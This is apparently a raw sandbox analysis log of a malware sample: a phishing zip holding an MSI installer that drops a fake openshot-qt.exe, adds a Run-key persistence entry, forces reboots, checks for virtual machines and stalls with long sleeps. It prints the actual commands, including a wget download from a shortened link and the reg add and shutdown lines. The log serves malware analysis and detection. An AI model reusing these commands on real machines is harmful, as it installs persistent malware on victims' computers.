Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: 45a20c.msi.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.dr
Source: Binary string: d3d12.pdbUGP source: shi5914.tmp.17.dr
Source: Binary string: d3d12.pdb source: shi5914.tmp.17.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdbu source: MSI77A4.tmp.15.dr, 45a20c.msi.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, M Contrato UK .msi.8.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb\ source: 45a20c.msi.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.dr
Source: Binary string: C:\Users\Pichau\Documents\SISTEMANOVO\SISTEMA2.0 - DLL - TIMER - RENOMEAR - ESCONDER - KLTODOGB - SHOT - COMPACT\Bin\Debug\libpython3.8.pdb source: openshot-qt.exe, openshot-qt.exe, 00000021.00000002.530094057.000000006A102000.00000020.00000001.01000000.00000008.sdmp, openshot-qt.exe, 00000021.00000002.529225253.0000000003372000.00000020.00000001.01000000.00000008.sdmp, libpython3.8.dll.17.dr
Source: Binary string: wininet.pdbUGP source: shi5809.tmp.17.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdb source: MSI77A4.tmp.15.dr, 45a20c.msi.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, M Contrato UK .msi.8.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI76D8.tmp.15.dr, M Contrato UK .msi.8.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbg source: MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI76D8.tmp.15.dr, M Contrato UK .msi.8.dr

Data Obfuscation

barindex
Source: libpython3.8.dll.17.dr, ProtoBuf/Serializers/TypeSerializer.cs.Net Code: CreateInstance
Source: 32.2.openshot-qt.exe.2730000.1.unpack, ProtoBuf/Serializers/TypeSerializer.cs.Net Code: CreateInstance
Source: 32.2.openshot-qt.exe.6a100000.2.unpack, ProtoBuf/Serializers/TypeSerializer.cs.Net Code: CreateInstance
Source: 33.2.openshot-qt.exe.6a100000.2.unpack, ProtoBuf/Serializers/TypeSerializer.cs.Net Code: CreateInstance
Source: 33.2.openshot-qt.exe.3370000.1.unpack, ProtoBuf/Serializers/TypeSerializer.cs.Net Code: CreateInstance
Source: C:\Windows\SysWOW64\wget.exeCode function: 2_2_00B90970 pushad ; retf 2_2_00B90971
Source: openshot-qt.exe.17.drStatic PE information: section name: .eh_fram
Source: shi5809.tmp.17.drStatic PE information: section name: .wpp_sf
Source: shi5809.tmp.17.drStatic PE information: section name: .didat
Source: shi5914.tmp.17.drStatic PE information: section name: .text_hf
Source: shi5914.tmp.17.drStatic PE information: section name: .didat
Source: shi5914.tmp.17.drStatic PE information: section name: .DDIData
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 32_2_003014F0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,32_2_003014F0
Source: shi5809.tmp.17.drStatic PE information: 0x84CD8294 [Wed Aug 8 17:47:00 2040 UTC]

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6D3F.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7129.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6BA7.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6B19.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6DAD.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\Public\Documents\tqVXfZhGNW\libpython3.8.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI76D8.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\shi5914.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6CB1.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI71C6.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI77A4.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI795E.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\shi5809.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6D3F.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7129.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6BA7.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6B19.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6DAD.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI76D8.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6CB1.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI71C6.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI77A4.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI795E.tmpJump to dropped file
Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run tqVXfZhGNWJump to behavior
Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run tqVXfZhGNWJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 7508Thread sleep count: 110 > 30Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 7508Thread sleep time: -55000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 8148Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7380Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7164Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe TID: 1404Thread sleep time: -55000s >= -30000s
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe TID: 1404Thread sleep time: -45000s >= -30000s
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe TID: 2056Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe TID: 4424Thread sleep count: 9344 > 30
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe TID: 2056Thread sleep count: 42 > 30
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe TID: 5540Thread sleep time: -55000s >= -30000s
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe TID: 5540Thread sleep time: -45000s >= -30000s
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe TID: 5948Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe TID: 5676Thread sleep count: 9543 > 30
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6D3F.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7129.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi5914.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6CB1.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI71C6.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi5809.tmpJump to dropped file
Source: C:\Windows\SysWOW64\unarchiver.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeThread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeThread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeWindow / User API: threadDelayed 9344
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeWindow / User API: threadDelayed 9543
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeAPI coverage: 5.4 %
Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeThread delayed: delay time: 55000
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeThread delayed: delay time: 45000
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeThread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeThread delayed: delay time: 55000
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeThread delayed: delay time: 45000
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: wget.exeBinary or memory string: Hyper-V RAW
Source: openshot-qt.exe, 00000020.00000002.528475350.00000000008CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
Source: cmd.exe, 0000000C.00000002.444273978.0000000002A04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: M Contrato UK .msi.8.drBinary or memory string: 01234567890.0.0.0.%dVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IROOT\CIMV2SELECT * FROM Win32_ComputerSystemSELECT * FROM Win32_BIOSManufacturerModelVersionGetting system informationManufacturer [Model [BIOS [IsWow64Processkernel32Software\Microsoft\Windows NT\CurrentVersionSYSTEM\CurrentControlSet\Control\ProductOptionsCurrentMajorVersionNumberCurrentMinorVersionNumberCurrentVersionCurrentBuildNumberReleaseIdCSDVersionProductTypeProductSuiteWinNTServerNTSmall BusinessEnterpriseBackOfficeCommunicationServerTerminal ServerSmall Business(Restricted)EmbeddedNTDataCenterPersonalBladeEmbedded(Restricted)Security ApplianceStorage ServerCompute Server Failed to create IWbemLocator object. Error code: \\Could not connect to WMI provider. Error code: Failed to initialize security. Error code: Could not set proxy blanket. Error code: WQLWMI Query failed: []. Error code:
Source: wget.exe, 00000002.00000002.260438119.0000000000B88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 32_2_003014F0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,32_2_003014F0
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 32_2_0030117C Sleep,Sleep,SetUnhandledExceptionFilter,__p__wcmdln,malloc,malloc,memcpy,__winitenv,_amsg_exit,_initterm,GetStartupInfoW,_cexit,_initterm,exit,32_2_0030117C
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 32_2_00301170 Sleep,SetUnhandledExceptionFilter,__p__wcmdln,malloc,malloc,memcpy,__winitenv,32_2_00301170
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 32_2_003011B3 Sleep,SetUnhandledExceptionFilter,__p__wcmdln,malloc,malloc,memcpy,__winitenv,32_2_003011B3
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://tinyurl.com/2abosd8k" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\mzgml0ot.pkx" "C:\Users\user\Downloads\Or amento - Pedido segunda-feira, 24 de abril de 2023F1nKhTNeGq3kSwMtzuiK.zipJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C "C:\Users\user\AppData\Local\Temp\mzgml0ot.pkx\M Contrato UK .msiJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\mzgml0ot.pkx\M Contrato UK .msi" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v tqVXfZhGNW /t reg_sz /d """"C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe""Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C shutdown -r -f -t 60Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c shutdown /r /t 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v tqVXfZhGNW /t reg_sz /d """"C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe"""Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -f -t 60Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 1 /fJump to behavior
Source: openshot-qt.exe, 00000020.00000002.529546442.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, openshot-qt.exe, 00000021.00000002.529577377.0000000003811000.00000004.00000800.00020000.00000000.sdmp, openshot-qt.exe, 00000021.00000002.529577377.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
